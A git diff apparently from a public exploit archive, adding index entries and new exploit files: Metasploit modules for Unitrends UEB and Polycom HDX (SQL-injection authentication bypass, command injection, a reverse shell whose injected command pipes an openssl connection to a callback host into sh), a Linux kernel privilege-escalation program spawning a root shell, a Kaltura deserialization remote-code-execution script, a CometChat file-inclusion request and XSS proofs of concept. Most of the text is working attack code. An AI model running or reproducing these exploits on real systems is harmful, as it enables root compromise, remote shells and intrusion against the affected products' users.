id,file,description,date,author,platform,type,port 42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0 42996,platforms/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",ios,remote,0 43008,platforms/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,java,remote,0 +43025,platforms/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Buffer Overflow",2017-10-21,"Berk Cem Göksel",windows,remote,0 +43030,platforms/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,443 +43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743 +43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -22417,7 +22423,7 @@ id,file,description,date,author,platform,type,port 9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9890,platforms/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 -9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 +9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0 @@ -30807,7 +30813,7 @@ id,file,description,date,author,platform,type,port 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 @@ -32055,7 +32061,7 @@ id,file,description,date,author,platform,type,port 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 -30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 +30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 @@ -38712,7 +38718,11 @@ id,file,description,date,author,platform,type,port 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0 +43023,platforms/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0 43018,platforms/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps,0 43019,platforms/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps,0 43021,platforms/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps,0 43022,platforms/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code Exploit",2017-10-17,"Fidus InfoSecurity",hardware,webapps,0 +43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0 +43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0 +43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0 diff --git a/platforms/hardware/webapps/43023.txt b/platforms/hardware/webapps/43023.txt new file mode 100755 index 000000000..f7dd4c996 --- /dev/null +++ b/platforms/hardware/webapps/43023.txt @@ -0,0 +1,25 @@ +# Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220 +# Date: 12/10/2017 +# Exploit Author: Thiago "THX" Sena +# Vendor Homepage: http://www.tp-link.com.br +# Version: TL-MR3220 +# Tested on: Windows 10 +# CVE : CVE-2017-15291 + +Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220 +cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291 +--------------------------------------------------------------- + +PoC: + +0x01 - First you go to ( http://IP:PORT/ ) + +0x02 - In the 'Wireless MAC Filtering' tab. + +0x03 - Will add a new MAC Address. + +0x04 - In 'Description' it will put the script ( ) and complete the registration. + +0x05 - Xss Vulnerability + +-------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/lin_x86/remote/43030.rb b/platforms/lin_x86/remote/43030.rb new file mode 100755 index 000000000..3f07dbbac --- /dev/null +++ b/platforms/lin_x86/remote/43030.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB 9 http api/storage remote root', + 'Description' => %q{ + It was discovered that the api/storage web interface in Unitrends Backup (UB) + before 10.0.0 has an issue in which one of its input parameters was not validated. + A remote attacker could use this flaw to bypass authentication and execute arbitrary + commands with root privilege on the target system. + }, + 'Author' => + [ + 'Cale Smith', # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave' # @iotennui + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], + ['CVE', '2017-12478'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => true + }, + 'DisclosureDate' => 'Aug 8 2017', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]) + ]) + deregister_options('SRVHOST', 'SRVPORT') + end + + #substitue some charactes + def filter_bad_chars(cmd) + cmd.gsub!("\\", "\\\\\\") + cmd.gsub!("'", '\\"') + end + + def execute_command(cmd, opts = {}) + session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass + session = Base64.strict_encode64(session) #b64 encode session token + + #substitue the cmd into the hostname parameter + parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + + + res = send_request_cgi({ + 'uri' => '/api/storage', + 'method' => 'POST', + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => parms, + 'headers' => + {'AuthToken' => session} + }) + + if res && res.code != 500 + fail_with(Failure::UnexpectedReply,'Unexpected response') + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 120) + end +end \ No newline at end of file diff --git a/platforms/lin_x86/remote/43031.rb b/platforms/lin_x86/remote/43031.rb new file mode 100755 index 000000000..63ff6d507 --- /dev/null +++ b/platforms/lin_x86/remote/43031.rb @@ -0,0 +1,119 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system. + }, + 'Author' => + [ + 'Jared Arave', # @iotennui + 'Cale Smith', # @0xC413 + 'Benny Husted' # @BennyHusted + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], + ['CVE', '2017-12477'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, + 'DisclosureDate' => 'Aug 8 2017', + 'DefaultTarget' => 0)) + register_options([ + Opt::RPORT(1743) + ]) + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') + end + + def check + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + #parse out the bpd port returned + bpd_port = buf1[-8..-3].to_i + + #check if it's a valid port number (1-65534) + if bpd_port && bpd_port >= 1 && bpd_port <= 65535 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + end + + def execute_command(cmd, opts = {}) + + #append a comment, ignore everything after our cmd + cmd = cmd + " #" + + # build the attack buffer... + command_len = cmd.length + 3 + packet_len = cmd.length + 23 + data = "\xa5\x52\x00\x2d" + data << "\x00\x00\x00" + data << packet_len + data << "\x00\x00\x00" + data << "\x01" + data << "\x00\x00\x00" + data << "\x4c" + data << "\x00\x00\x00" + data << command_len + data << cmd + data << "\x00\x00\x00" + + begin + print_status("Connecting to xinetd for bpd port...") + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + + #parse out the bpd port returned, we will connect back on this port to send our cmd + bpd_port = buf1[-8..-3].to_i + + print_good("bpd port recieved: #{bpd_port}") + vprint_status("Connecting to #{bpd_port}") + + s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) + vprint_good('Connected!') + + print_status('Sending command buffer to xinetd') + + s1.put(data) + s2.get_once(-1,1).to_s + + disconnect(s1) + disconnect(s2) + + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + fail_with(Failure::Unreachable, "#{peer} - Connection to server failed") + end + + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 200) + end +end \ No newline at end of file diff --git a/platforms/linux/local/43029.c b/platforms/linux/local/43029.c new file mode 100755 index 000000000..041e9a163 --- /dev/null +++ b/platforms/linux/local/43029.c @@ -0,0 +1,127 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include + +struct cred; +struct task_struct; + +typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3))); +typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3))); + +prepare_kernel_cred_t prepare_kernel_cred; +commit_creds_t commit_creds; + +void get_shell() { + char *argv[] = {"/bin/sh", NULL}; + + if (getuid() == 0){ + printf("[+] Root shell success !! :)\n"); + execve("/bin/sh", argv, NULL); + } + printf("[-] failed to get root shell :(\n"); +} + +void get_root() { + if (commit_creds && prepare_kernel_cred) + commit_creds(prepare_kernel_cred(0)); +} + +unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret = 0; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + printf("[-] Failed to open /proc/kallsyms\n"); + exit(-1); + } + printf("[+] Find %s...\n", name); + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + printf("[+] Found %s at %lx\n", name, addr); + return addr; + } + } + fclose(f); + return 0; +} + +int main(int ac, char **av) +{ + if (ac != 2) { + printf("./exploit kernel_offset\n"); + printf("exemple = 0xffffffff81f3f45a"); + return EXIT_FAILURE; + } + + // 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions + prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred"); + commit_creds = (commit_creds_t)get_kernel_sym("commit_creds"); + // have_canfork_callback offset <= rendre dynamique aussi + + pid_t pid; + /* siginfo_t info; */ + + // 1 - Mapper la mmoire l'adresse 0x0000000000000000 + printf("[+] Try to allocat 0x00000000...\n"); + if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){ + printf("[-] Failed to allocat 0x00000000\n"); + return -1; + } + printf("[+] Allocation success !\n"); + /* memset(0, 0xcc, 4096); */ +/* +movq rax, 0xffffffff81f3f45a +movq [rax], 0 +mov rax, 0x4242424242424242 +call rax +xor rax, rax +ret +replace 0x4242424242424242 by get_root +https://defuse.ca/online-x86-assembler.htm#disassembly + */ + unsigned char shellcode[] = + { 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 }; + void **get_root_offset = rawmemchr(shellcode, 0x42); + (*get_root_offset) = get_root; + + memcpy(0, shellcode, sizeof(shellcode)); + /* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */ + + if(-1 == (pid = fork())) { + perror("fork()"); + return EXIT_FAILURE; + } + + if(pid == 0) { + _exit(0xDEADBEEF); + perror("son"); + return EXIT_FAILURE; + } + + siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0); + waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED); + +// TRIGGER + pid = fork(); + printf("fork_ret = %d\n", pid); + if (pid > 0) + get_shell(); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/platforms/multiple/webapps/43024.txt b/platforms/multiple/webapps/43024.txt new file mode 100755 index 000000000..daeb22ebd --- /dev/null +++ b/platforms/multiple/webapps/43024.txt @@ -0,0 +1,43 @@ +# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server +# Shodan Dork: Logitech Media Server +# Date: 14/10/2017 +# Exploit Author: Thiago "THX" Sena +# Vendor Homepage: https://www.logitech.com +# Tested on: windows 10 +# CVE : CVE-2017-15687 + +----------------------------------------------- + +PoC: + +- First you go to ( http://IP:PORT/ ) + +- Then put the script ( ) + +- ( http://IP:PORT/ ) + +- Xss Vulnerability + +--------------------------------------------------- + +[Versões Afetadas] + +7.7.3 +7.7.5 +7.9.1 +7.7.2 +7.7.1 +7.7.6 +7.9.0 + + +[Request] + +GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0 +Connection: close +Upgrade-Insecure-Requests: 1 diff --git a/platforms/php/webapps/43027.txt b/platforms/php/webapps/43027.txt new file mode 100755 index 000000000..f9fa7feec --- /dev/null +++ b/platforms/php/webapps/43027.txt @@ -0,0 +1,60 @@ +# Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion +# Date: 2017-10-22 +# Exploit Author: Luke Paris (Paradoxis) +# Vendor Homepage: https://cometchat.com/ +# Version: < 6.2.0 BETA 1 +# Tested on: Ubuntu Linux 14.04 +# +# -------------------------------------------------------------------------------------- +# +# In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed +# any unauthorised attacker to modify the include path of a php file by sending an +# HTTP request with a crafted 'cc_lang' cookie. +# +# If successfully exploited an attacker could leverage this bug to execute arbitrary PHP +# code which resides somewhere else on the server (eg: uploaded via an upload form). +# +# Due to the fact that this bug resides in the configuration file of the applications +# it might be possible that future versions of the chat application still contain the +# file inclusion bug as the script might have been re-applied after an update. +# +# -------------------------------------------------------------------------------------- +# +# The vulnerability resides in the application's configuration file, near the beginning +# of the script the following code block is executed, this is where an attacker is able +# to inject a string into the cc_lang cookie. + +/* COOKIE */ +$cookiePrefix = 'cc_'; + +/* LANGUAGE START */ +$lang = 'en'; + +/* LANGUAGE END */ +if (!empty($_COOKIE[$cookiePrefix."lang"])) { + $lang = $_COOKIE[$cookiePrefix."lang"]; +} + +# Near the end of the configuration file, the following code block is executed. +# This is where the exploit is triggered by not sanitising the $lang variable properly. + +include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php'; +if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) { + include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php'; +} + +# The following example demonstrates how an attacker could leverage this bug to gain control +# over the server, which could result in a full server compromise (assuming the attacker has +# already managed to write a webshell to the servers' disk somehow): + +GET /cometchat/config.php?cmd=id HTTP/1.1 +Host: example.com +Connection: keep-alive +Cookie: cc_lang=../../uploads/evil + +HTTP/1.1 200 OK +Host: example.com +Connection: close +Content-type: text/html; charset=UTF-8 + +uid=33(www-data) gid=33(www-data) groups=33(www-data) diff --git a/platforms/php/webapps/43028.py b/platforms/php/webapps/43028.py new file mode 100755 index 000000000..224ebd5f2 --- /dev/null +++ b/platforms/php/webapps/43028.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +# Kaltura <= 13.1.0 RCE (CVE-2017-14143) +# https://telekomsecurity.github.io/2017/09/kaltura-rce.html +# +# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')" +# [~] host: https://example.com +# [~] entry_id: 0_xxxxxxxx +# [~] code: system('id') +# [+] sending request.. +# uid=1003(wwwrun) gid=50004(www) groups=50004(www),7373(kaltura) + +import urllib +import urllib2 +import base64 +import md5 +import sys + +cookie_secret = 'y3tAno3therS$cr3T'; + +def exploit(host, entry_id, php_code): + print("[+] Sending request..") + url = "{}/index.php/keditorservices/getAllEntries?list_type=15&entry_id={}".format(host, entry_id) + + cmd = "{}.die();".format(php_code) + cmd_len = len(cmd) + + payload = "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:%s:\"%s\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}" + + exploit_code = payload % (len(cmd), cmd) + encoded = base64.b64encode(exploit_code) + md5_hash = md5.new("%s%s" % (encoded, cookie_secret)).hexdigest() + + cookies={'userzone': "%s%s" % (encoded, md5_hash)} + + r = urllib2.Request(url) + r.add_header('Cookie', urllib.urlencode(cookies)) + + req = urllib2.urlopen(r) + return req.read() + +if __name__ == '__main__': + + if len(sys.argv) < 4: + print("Usage: %s " % sys.argv[0]) + print(" example: %s http://example.com 0_abc1234 system('id')" % sys.argv[0]) + sys.exit(0) + + host = sys.argv[1] + entry_id = sys.argv[2] + cmd = sys.argv[3] + + print("[~] host: %s" % host) + print("[~] entry_id: %s" % entry_id) + print("[~] php_code: %s" % cmd) + + result = exploit(sys.argv[1], sys.argv[2], sys.argv[3]) + + print(result) \ No newline at end of file diff --git a/platforms/unix/remote/43032.rb b/platforms/unix/remote/43032.rb new file mode 100755 index 000000000..168aa77ed --- /dev/null +++ b/platforms/unix/remote/43032.rb @@ -0,0 +1,246 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Polycom Command Shell Authorization Bypass', + 'Alias' => 'polycom_hdx_auth_bypass', + 'Author' => + [ + 'Paul Haas ', # module + 'h00die ', # submission/cleanup + ], + 'DisclosureDate' => 'Jan 18 2013', + 'Description' => %q( + The login component of the Polycom Command Shell on Polycom HDX + video endpoints, running software versions 3.0.5 and earlier, + is vulnerable to an authorization bypass when simultaneous + connections are made to the service, allowing remote network + attackers to gain access to a sandboxed telnet prompt without + authentication. Versions prior to 3.0.4 contain OS command + injection in the ping command which can be used to execute + arbitrary commands as root. + ), + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ], + [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ], + [ 'EDB', '24494'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => { 'PayloadType' => 'cmd' } + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' }, + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(23), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) + ], self.class + ) + register_advanced_options( + [ + OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]), + OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100]) + ], self.class + ) + end + + def check + connect + sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n") + Rex.sleep(1) + res = sock.get_once + disconnect + + if !res && !res.empty? + return Exploit::CheckCode::Safe + end + + if res =~ /Welcome to ViewStation/ + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + # Keep track of results (successful connections) + results = [] + + # Random string for password + password = Rex::Text.rand_text_alpha(rand(5) + 1) + + # Threaded login checker + max_threads = datastore['THREADS'] + cur_threads = [] + + # Try up to 100 times just to be sure + queue = [*(1..datastore['MAX_CONNECTIONS'])] + + print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ") + until queue.empty? + while cur_threads.length < max_threads + + # We can stop if we get a valid login + break unless results.empty? + + # keep track of how many attempts we've made + item = queue.shift + + # We can stop if we reach max tries + break unless item + + t = Thread.new(item) do |count| + sock = connect + sock.put(password + "\n") + res = sock.get_once + + until res.empty? + break unless results.empty? + + # Post-login Polycom banner means success + if res =~ /Polycom/ + results << sock + break + # bind error indicates bypass is working + elsif res =~ /bind/ + sock.put(password + "\n") + # Login error means we need to disconnect + elsif res =~ /failed/ + break + # To many connections means we need to disconnect + elsif res =~ /Error/ + break + end + res = sock.get_once + end + end + + cur_threads << t + end + + # We can stop if we get a valid login + break unless results.empty? + + # Add to a list of dead threads if we're finished + cur_threads.each_index do |ti| + t = cur_threads[ti] + unless t.alive? + cur_threads[ti] = nil + end + end + + # Remove any dead threads from the set + cur_threads.delete(nil) + + Rex.sleep(0.25) + end + + # Clean up any remaining threads + cur_threads.each { |sock| sock.kill } + + if !results.empty? + print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw") + do_payload(results[0]) + else + print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") + end + end + + def do_payload(sock) + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128 + cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n" + sock.put(cmd) + + # Give time for our command to be queued and executed + 1.upto(5) do + Rex.sleep(1) + break if session_created? + end + end + + def stage_final_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == 'local' + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self + } + ) + + self.service.on_client_connect_proc = proc { |client| + stage_final_payload(client) + } + + # Start the listening service + self.service.start + end + + # Shut down any running services + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.is_a?(Rex::Service) + if self.service.is_a?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + # Accessor for our TCP payload stager + attr_accessor :service +end \ No newline at end of file diff --git a/platforms/windows/dos/43026.py b/platforms/windows/dos/43026.py new file mode 100755 index 000000000..8be499370 --- /dev/null +++ 